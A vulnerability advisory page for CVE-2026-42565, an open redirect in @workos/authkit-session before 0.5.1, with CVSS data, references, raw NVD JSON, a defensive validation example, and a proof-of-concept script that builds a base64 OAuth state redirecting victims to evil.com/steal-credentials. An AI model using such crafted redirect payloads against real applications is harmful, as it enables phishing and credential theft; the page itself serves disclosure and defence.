Security Vulnerability Report
CVE-2026-42565 CVSS 4.3 MEDIUM

Published: 2026-05-11 20:25:43
Last Modified: 2026-05-11 20:25:43

Description

@workos/authkit-session is a toolkit for building WorkOS AuthKit framework integrations. Prior to 0.5.1, an open redirect vulnerability exists in AuthService.handleCallback due to insufficient validation of the returnPathname value derived from the OAuth state parameter. The state parameter is round-tripped through the identity provider (IdP) and can be influenced by an attacker. The handleCallback function decodes and returns returnPathname without enforcing restrictions on origin or scheme. As a result, attacker-controlled values may be returned to the application. If this value is used directly in a redirect, it may cause the user to be redirected to an external, attacker-controlled site. This vulnerability is fixed in 0.5.1.
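The check the description says is missing, written out as an added example (this is not the project's code or its 0.5.1 fix): a return path recovered from the OAuth state is only honoured if it resolves to a same-origin relative path, so absolute URLs, scheme-relative "//host" forms and backslash variants all fall back to "/". The base64-JSON shape of the state, the function names, and the placeholder origin https://app.invalid are assumptions made here for illustration.

```javascript
// Added example, not part of the advisory or the @workos/authkit-session code.
// Assumption: state carries base64-encoded JSON of the form {returnPathname: "..."}.
const DEFAULT_PATH = '/';
// Placeholder origin used only to resolve candidates; any fixed origin works.
const RESOLVE_ORIGIN = 'https://app.invalid';

// Return a redirect target that is guaranteed to stay on the application origin.
function safeReturnPathname(candidate) {
  if (typeof candidate !== 'string' || candidate.length === 0) return DEFAULT_PATH;
  // Must be an origin-relative path: anything else ("https://...", "javascript:",
  // "evil.example/x") is rejected outright.
  if (!candidate.startsWith('/')) return DEFAULT_PATH;
  // "//host" is scheme-relative and "/\host" is normalised to it by browsers.
  if (candidate.length > 1 && (candidate[1] === '/' || candidate[1] === '\\')) return DEFAULT_PATH;
  // Control characters and whitespace are stripped by URL parsers, which can hide
  // the patterns above, so reject them instead of trying to normalise.
  if (/[\x00-\x1f\x7f\s]/.test(candidate)) return DEFAULT_PATH;
  // Final authority check: resolve against a fixed origin and require that the
  // resolved URL is still on that origin (WHATWG parsing, as a browser would do).
  let resolved;
  try {
    resolved = new URL(candidate, RESOLVE_ORIGIN);
  } catch (e) {
    return DEFAULT_PATH;
  }
  if (resolved.origin !== RESOLVE_ORIGIN) return DEFAULT_PATH;
  return resolved.pathname + resolved.search + resolved.hash;
}

// Decode the state parameter as the PoC above assumes it is encoded and apply the
// check; malformed or missing input degrades to the default path.
function decodeStateReturnPathname(stateParam) {
  try {
    const json = Buffer.from(String(stateParam), 'base64').toString('utf8');
    const obj = JSON.parse(json);
    return safeReturnPathname(obj && obj.returnPathname);
  } catch (e) {
    return DEFAULT_PATH;
  }
}

// Constructed sample: a state value carrying an external destination.
const sampleState = Buffer.from(
  JSON.stringify({ returnPathname: 'https://evil.example/steal-credentials' })
).toString('base64');
console.log('external destination ->', decodeStateReturnPathname(sampleState)); // "/"
console.log('relative path       ->', safeReturnPathname('/account/settings?tab=1'));
```

The two-stage approach matters: the string checks stop the obvious forms, and the URL resolution catches whatever the string checks did not anticipate, because the decision is made on what a browser would actually navigate to rather than on the raw string.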

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data available. The affected package and version range stated in the description:

@workos/authkit-session < 0.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript (Node.js)
// Conceptual PoC for CVE-2026-42565
// Description: Demonstrates how an attacker can craft a malicious state parameter
// to exploit the open redirect vulnerability in @workos/authkit-session.

// 1. Attacker defines the malicious destination
const maliciousRedirectUrl = "https://evil.com/steal-credentials";

// 2. Construct the payload for the state parameter
// The application expects a JSON object containing 'returnPathname'
const payload = { returnPathname: maliciousRedirectUrl };

// 3. Encode the payload (assuming Base64 encoding as per common OAuth patterns)
const encodedState = Buffer.from(JSON.stringify(payload)).toString('base64');

// 4. Generate the exploit URL
// This URL simulates the callback sent from the Identity Provider (IdP)
const exploitUrl = `https://target-app.com/auth/callback?state=${encodedState}&code=auth_code_placeholder`;

console.log("[+] Exploit Generated:");
console.log(exploitUrl);
console.log("\n[+] Scenario:");
console.log("If the victim clicks this link (or is redirected here after IdP login),");
console.log("the vulnerable handleCallback function will decode the state,");
console.log("extract returnPathname, and redirect the user to:", maliciousRedirectUrl);

References

Weakness: CWE-601 (URL Redirection to Untrusted Site, "Open Redirect")

https://github.com/workos/authkit-session/commit/f56e1d6214a93160759e5677b7a3d772b244db39
https://github.com/workos/authkit-session/releases/tag/v0.5.1
https://github.com/workos/authkit-session/security/advisories/GHSA-vvvv-983w-r7pv

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42565", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:42.640", "lastModified": "2026-05-11T20:25:42.640", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "@workos/authkit-session is a toolkit for building WorkOS AuthKit framework integrations. Prior to 0.5.1, an open redirect vulnerability exists in AuthService.handleCallback due to insufficient validation of the returnPathname value derived from the OAuth state parameter. The state parameter is round-tripped through the identity provider (IdP) and can be influenced by an attacker. The handleCallback function decodes and returns returnPathname without enforcing restrictions on origin or scheme. As a result, attacker-controlled values may be returned to the application. If this value is used directly in a redirect, it may cause the user to be redirected to an external, attacker-controlled site. This vulnerability is fixed in 0.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/workos/authkit-session/commit/f56e1d6214a93160759e5677b7a3d772b244db39", "source": "[email protected]"}, {"url": "https://github.com/workos/authkit-session/releases/tag/v0.5.1", "source": "[email protected]"}, {"url": "https://github.com/workos/authkit-session/security/advisories/GHSA-vvvv-983w-r7pv", "source": "[email protected]"}]}}